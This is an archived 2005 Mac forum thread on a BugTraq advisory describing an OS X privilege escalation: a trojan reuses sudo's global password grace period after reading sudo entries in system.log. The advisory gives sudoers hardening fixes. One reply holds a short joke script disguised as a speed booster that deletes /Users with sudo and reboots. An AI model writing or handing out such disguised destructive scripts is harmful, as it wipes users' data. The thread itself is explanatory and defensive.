OSX - trojan apps can bypass authentication controls and gain root privilages

Discussion in 'General Mac Discussion' started by mthangbk, Apr 6, 2005.

  1. mthangbk macrumors newbie

    Joined:
    Mar 9, 2005
    Location:
    Ha Noi, Viet Nam
    #1
    I've just got this email on BugTraq today. It prove that it is possible to write a virus for OS X.


    ---------
    OSX Root Compromise
    04/05/2005

    Summary:
    OSX can be root compromised by a trojan application. The trojan
    application does not require explicit user authentication to elevate its
    privileges to root, nor does the root account need to be enabled. The
    Trojan application must be run from an account that is in the admin group,
    which is the default for the first account created and the context in
    which most users run. Once executed, the trojan application must only
    wait until the user leverages the sudo utility, either at the command line
    or by another application that leverages sudo to elevate it's privileges.

    A demonstration app is available at www.adbas.net/software/rooted.dmg

    Status:
    The issue has been reported to Apple. Apple does not feel this is an issue
    as "Administrators should not run arbitrary software." While it is true
    that users should be cautious of running untrusted code, this answer is
    unacceptable. Administrators are required to authenticate actions to the
    core operating system. This vulnerability allows applications to bypass
    this requirement by "piggy-backing" off an unrelated authorization event.

    Versions Affected: OSX 10.3.x confirmed, OSX 10.2 probable

    Issue:
    There are 3 factors that allow this to be possible:

    1) sudo is by default, configured to allow a 5 minute password time out.
    This means that subsequent use of sudo, within this grace period does not
    require a password for authentication.

    2) sudo is by default, configured to be global, meaning its session is
    not tied to a tty but rather to only the user and time.

    3) sudo writes its entries to /var/log/system.log, which, by default, is
    readable by anyone in the admin group.

    All the trojan application needs to do is monitor the /var/log/system.log
    file for sudo entries for the user who executed the trojan. Once an entry
    is found, that is within the timeout grace window, the trojan can then
    elevate it's privileges to root by simply executing sudo "anycommand".

    Fixing:
    Any of following changes to sudo will correct the problem.

    To redirect sudo logs to /var/log/secure.log (which has the appropriate
    permissions and is a more appropriate log for authentication components),
    add the following lines to the /etc/sudoers file, in the "Defaults"
    section:

    Defaults:ALL !syslog
    Defaults:ALL logfile=/var/log/secure.log


    To remove the password grace period which will force the user to
    authenticate every time sudo is called, add the following line to the
    /etc/sudoers file, in the "Defaults" section:

    Defaults:ALL timestamp_timeout=0


    To limit sudo password grace period to individual ttys, instead of global,
    add the following line to the /etc/sudoers file, in the "Defaults"
    section:

    Defaults:ALL tty_tickets


    Redirecting sudo's logging and containing sudo sessions to individual
    ttys, in the authors opinion, provides the best balance of functionality
    and security.

    Please ensure that you use the visudo tool to edit the /etc/sudoers file.
    This utility will check your syntax, keeping you from corrupting your
    file. By default, visudo uses vi as its editor.
     
  2. AppleMatt macrumors 68000

    AppleMatt

    Joined:
    Mar 17, 2003
    Location:
    UK
    #2
    It's still not a virus, but thanks for playing.

    AppleMatt

     
  3. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #3
    is the sudo command used when you are asked for the administrator's password? If not, seems like a far fetched scenario. How often do you use the sudo command?
     
  4. angelneo macrumors 68000

    Joined:
    Jun 13, 2004
    Location:
    afk
    #4
    mthangbk: So in short, you are saying that this "virus" requires a user who is an admin as well to double click on that application and then for that same admin to run another application which requires a sudo at the same session. Sounds like an awfully long series of coincidence for this "virus" to work.
     
  5. rainman::|:| macrumors 603

    rainman::|:|

    Joined:
    Feb 2, 2002
    Location:
    iowa
    #5
    While this isn't a virus, this is a step closer... i've always kind of wondered about the 5-minute sudo grace, and why another process couldn't take advantage of that. But the fact remains that the virus would need to be installed and launched by the user, which is the first line of defense-- needing root privileges is actually the second line of defense. If malignant code can't propagate and still has to be launched, it's not much of a virus...

    Of course, once they figure out how to get the virus to propagate, we're screwed. Assuming Apple doesn't close up this hole first. Not like they drag their feet on the really critical stuff or anything...
     
  6. brap macrumors 68000

    Joined:
    May 10, 2004
    Location:
    Nottingham
    #6
    Not really. This trojan could just lay dormant, perhaps even attach itself to your startup, waiting for sudo to be invoked. Let's not start making excuses here, it's possible - and it's a lot more likely to be dangerous than the other 'test' viruses out there.

    I envisage a scenario where an app installer is faked, runs a mock dmg verification, and 'fails' it (while it does the dirty in the background). App lies running, user is none the wiser - for those running Powerbooks, who just sleep their machine, this is quite a danger.
     
  7. bryanc macrumors 6502

    Joined:
    Feb 12, 2003
    Location:
    Fredericton, NB Canada
    #7
    This is NOT A VIRUS!

    Arrgh! I hate it when people confuse any and all 'security issues' with viruses.

    Viruses are self-replicating and self-distributing. They may or may not have damaging consequences for the systems they infect, and they may or may not require admin privileges to work.

    The issue here is a potential unintended privilege escalation. It has nothing to do with viruses.

    Apple has intentionally made it possible for Admin users to access root privileges, but only by supplying a password. The proof-of-concept being discussed illustrates that such a user could inadvertently supply such privileges to other processes being run by the Admin user. I'm not sure that this is a security issue. It is an intentional feature of the security model of OS X (once you've supplied the root password, you don't need to re-supply it for every command...that would be a PITA). However, it is something that Admin users should be aware of.

    All this means is you should not execute untrusted code while logged in as an Admin user.

    This is no more of a security problem than people who insist on logging into their linux machines as root and then surfing the net. Sure, bad things can happen if you're an idiot and run your machine in ways that it was not designed to be run. How is this a problem?

    At any rate, it's got nothing to do with viruses.
     
  8. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #8
    Sigh.

    Code:
    #!/bin/sh
    
    /bin/echo "Doubling your internet speed..."
    /usr/bin/sudo /bin/rm -rf /Users
    /bin/echo "Doubling your RAM..."
    /usr/bin/sudo /sbin/shutdown -r now
    Save this as a file called SuperDoubler.command, have users double click it..

    Ooooo! It's Mac OS X malware! Run for the hills!


    HOWEVER, the original poster's suggestions on shoring up some of the more lenient, out-of-the-box settings for sudo, are good ones.
     
  9. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #9

    I don't know how much I agree with that. Granted, todays viruses are self replicating, but back in the early PC days, getting a virus in your computer may not have had anything to do with the virus being self replicating, or infecting your PC from another machine. Back then, people mostly got viruses through downloading and running something they shouldn't, which is basically what this proof of concept involves.

    Perhaps malware is a more corrct term these days when you have a clear distinction between self propogating software, and non...however, I don't think it's entirely incorrect to label a piece of software that you download and run, and that does harm to your computer, as a virus. I remember bcak in the day in order to give someone's computer a virus, you had to bring a floppy over to his/her computer! Not that I ever did that or anything...lol
     
  10. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #10
    A virus, by definition, has to self-replicate, in order to spread itself.. Which the above does not and cannot do. If the above installed itself, and then enabled postfix and sent out copies of itself to everyone in your Address Book, it would be MUCH closer to being a virus.
     
  11. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #11

    Yes, in the traditional sense of the word a virus self replicates, but when you are talking about the term applied to computers, definitions can and often do change. Perhaps the definition of virus as it relates to computers has changed over the years, but my point was simply that as little as 10 years ago viruses typically didn't self replicate...therefore getting bent out of shape about the terminology and liberal use of the word "virus" seems unnecessary to me.
     
  12. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #12
    I'm still interested in finding out in what common circumstances Sudo is used by either a user or application.
     
  13. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #13
    Me too. Although I have too say I was surprised the first time I sudo'd, authenticated, closed the terminal window, and opened a new terminal window, and was not required to authenticate for a sudo from the new window. I don't see any obvious reason why the option of tying the sudo command to a terminal session wouldn't be a good thing, unless it is implicitly used when GUI apps make you authenticate, and there is no equivalent to the terminal session for them.
     
  14. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #14
    I use sudo everyday, multiple times a day. As an Mac sysadmin, it's necessary. For reading logs, for port scaning, for running scripts and compiled binaries, etc, etc. I think most users of OS X don't venture into the CLI that often (if at all). From the GUI, there's another 'sudo-like' authentication that is used. I believe it's /System/Library/CoreServices/SecurityAgent.app.

    I would agree that the term "malware" is much more generic and should be applied liberally to things such as these. It's not really fair to compare a virus from 10 years ago to a modern virus, as they have changed considerably in scope and sophistication. However, I insist that for it to be a TRUE Mac virus, it would need to reach out and infect other Macs in some way, without user intervention. Otherwise, it's just malware. Unfortunately, the term "virus" and "viruses" has become a catch all for end-users who really don't understand the distinction between variants.
     
  15. Sedulous macrumors 68000

    Sedulous

    Joined:
    Dec 10, 2002
    #15
    Manually running cron jobs, or prebindings.
     
  16. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #16

    So sudo is not used when OSX automatially runs cron jobs?
     
  17. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #17
    I was thinking of more daily things. This is definitely true -- I have a maintenance script incorporating these things that uses sudo. But I would think that this would be a low-risk category, esp. for prebindings, because you have to reboot right after, anyway. Although I guess, if the malware was already active, it could instantly latch onto the sudo before you even finish prebinding....
     
  18. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #18
    No -- you don't have to authenticate for it to happen, do you? The version of the tasks that are run via cron are already owned by root, so it isn't necessary. At least, that's the way I understand it. You'd have to authenticate or sudo to *change* the cron schedule, I think, but not for it to execute once it's set. You could in principle put anything for which you'd normally need to authenticate to root into the cron schedule, and it should run without the need for authentication, right?
     
  19. wrldwzrd89 macrumors G5

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #19
    That is correct. Regardless of what priveleges the task needs, if it's in the system crontab, it won't have to be authenticated first - the task is considered authenticated when it is inserted in the system crontab - to do that requires root priveleges.
     
  20. daveL macrumors 68020

    daveL

    Joined:
    Jun 18, 2003
    Location:
    Montana
    #20
    Let's face it, most Mac users have admin privileges. There's nothing that tells them to create a non-admin account to use for all their routine work. Granted, these same users are not *as* likely to be downloading miscellaneous 3rd party apps off the 'net and trying them out, compared to power users, but the risk remains. I certainly don't see *any* downside to making the suggested 'sudo' configuration changes; they can't possibly hurt and may well save your butt, however unlikely the suggested scenario may be. I also can't see why the suggested 'sudo' configuration isn't the out-of-the-box default.

    I'm updating the 'sudo' configiration on all my Macs now ...
     
  21. Sun Baked macrumors G5

    Sun Baked

    Joined:
    May 19, 2002
    #21
    Nope, he said trojan (the member said virus) -- but we did have problems with those in OS 9 also, the ones tied to some of the popular shareware games.

    Of course these days it'll be something like widgets, OS themes, torrent/chat app, ect. that would tempt you to downlownload a trojan.

    All they need to do is corrupt a popular downloaded item.
     
  22. csubear macrumors 6502a

    csubear

    Joined:
    Aug 22, 2003
    #22
    Will this kill the visual sudo's ablity to work? Or does that gui interface use something completly diffrent?
     
  23. daveL macrumors 68020

    daveL

    Joined:
    Jun 18, 2003
    Location:
    Montana
    #23
    What "visual sudo"?
     
  24. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #24
    Since this came up, I've been wondering...I set up a main user account under my username (mkrishnan) as an admin, and a guest account with simplified finder, which I never use, but thought I might need at some point. I'm starting to think that if I ever clean install Panther, or I get Tiger, I should have set up an admin account that I primarily do not use, and then a managed account for my usual activity. What is the difference between a managed account with no limitations and an admin account?
     
  25. daveL macrumors 68020

    daveL

    Joined:
    Jun 18, 2003
    Location:
    Montana
    #25
    You won't be able to install software or modify system settings. Basically, if the files live in your /Users/xxx folder, you have control, otherwise it depends on the permissions and ownership of files outside your User folder. So, you can run apps and edit documents, pictures, etc., but you'll have to switch to the admin user to muck with network, security and any other settings that are system-wide or to install software, add system-wide plugins, etc.
     

Share This Page